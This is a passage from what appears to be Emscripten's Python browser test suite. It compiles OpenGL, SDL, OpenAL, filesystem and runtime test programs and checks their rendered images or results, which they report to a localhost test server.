'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
@requires_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_hardware
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_hardware
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_hardware
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216', '-s', 'WASM=0']) # check for uniform4fv slice being valid in split memory
@requires_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
def test_s3tc_crunch(self):
try:
print('Crunch is located at ' + CRUNCH)
except:
return self.skipTest('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print(args)
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
print('Crunch is located at ' + CRUNCH)
except:
return self.skipTest('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
@requires_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm]).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
